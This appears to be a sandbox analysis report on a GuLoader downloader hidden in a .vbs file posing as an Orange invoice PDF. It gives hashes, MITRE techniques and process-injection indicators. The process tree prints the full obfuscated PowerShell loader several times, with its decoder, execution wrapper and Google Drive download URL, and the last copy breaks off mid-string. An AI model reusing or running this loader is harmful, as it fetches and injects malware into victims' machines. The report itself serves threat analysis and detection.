guloader | 31e13c7c061209fcfc2781b6ccd4b91ece4482791dfa1fd899903646e916f600

General

Target

Orange_doklad_CN0179783543_20240916_FR20934200077085·pdf.vbs
Size

39KB
MD5

a8eaec0ce9a1a02805ca7248d61dce62
SHA1

3adc63cda4f1d797b49b0ae721cbb41caecda524
SHA256

c54caab4e2957ad82b579e23bb079984b7aaf13484f8c5989a6b4aa84048bc2c
SHA512

aac88d2ba244c376eee4ce0ea38050b95e45f682d7f667b11d016e77822484864f5c6b7fa8b0ea6bc98463c2e3dcfd0bdc3bd2bc16204368109512d28ecd472a
SSDEEP

384:Z9vOg3gWe95Arw8M+OJWlZjYUKsA8r7Opt/in6M6zyQQZWnspmErww6u3TTluQeW:Zp3gWU8MaSpBm6eMs34W30atvp

Score

10^/10

guloader discovery downloader execution

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2548	powershell.exe
7	2548	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2548	powershell.exe
2188	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
9	drive.google.com
4	drive.google.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2548	powershell.exe
2712	cmd.exe
2188	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1864	wabmig.exe
1864	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2188	powershell.exe
1864	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2188 set thread context of 1864	2188	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2188	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2548	powershell.exe
2188	powershell.exe
2188	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2188	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1864	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2092 wrote to memory of 2548	2092	WScript.exe	30
PID 2092 wrote to memory of 2548	2092	WScript.exe	30
PID 2092 wrote to memory of 2548	2092	WScript.exe	30
PID 2548 wrote to memory of 2756	2548	powershell.exe	32
PID 2548 wrote to memory of 2756	2548	powershell.exe	32
PID 2548 wrote to memory of 2756	2548	powershell.exe	32
PID 2548 wrote to memory of 2712	2548	powershell.exe	34
PID 2548 wrote to memory of 2712	2548	powershell.exe	34
PID 2548 wrote to memory of 2712	2548	powershell.exe	34
PID 2712 wrote to memory of 2188	2712	cmd.exe	35
PID 2712 wrote to memory of 2188	2712	cmd.exe	35
PID 2712 wrote to memory of 2188	2712	cmd.exe	35
PID 2712 wrote to memory of 2188	2712	cmd.exe	35
PID 2188 wrote to memory of 2608	2188	powershell.exe	36
PID 2188 wrote to memory of 2608	2188	powershell.exe	36
PID 2188 wrote to memory of 2608	2188	powershell.exe	36
PID 2188 wrote to memory of 2608	2188	powershell.exe	36
PID 2188 wrote to memory of 1864	2188	powershell.exe	38
PID 2188 wrote to memory of 1864	2188	powershell.exe	38
PID 2188 wrote to memory of 1864	2188	powershell.exe	38
PID 2188 wrote to memory of 1864	2188	powershell.exe	38
PID 2188 wrote to memory of 1864	2188	powershell.exe	38
PID 2188 wrote to memory of 1864	2188	powershell.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0179783543_20240916_FR20934200077085·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
    3⤵
    PID:2756
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
    3⤵
    - Network Service Discovery
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi 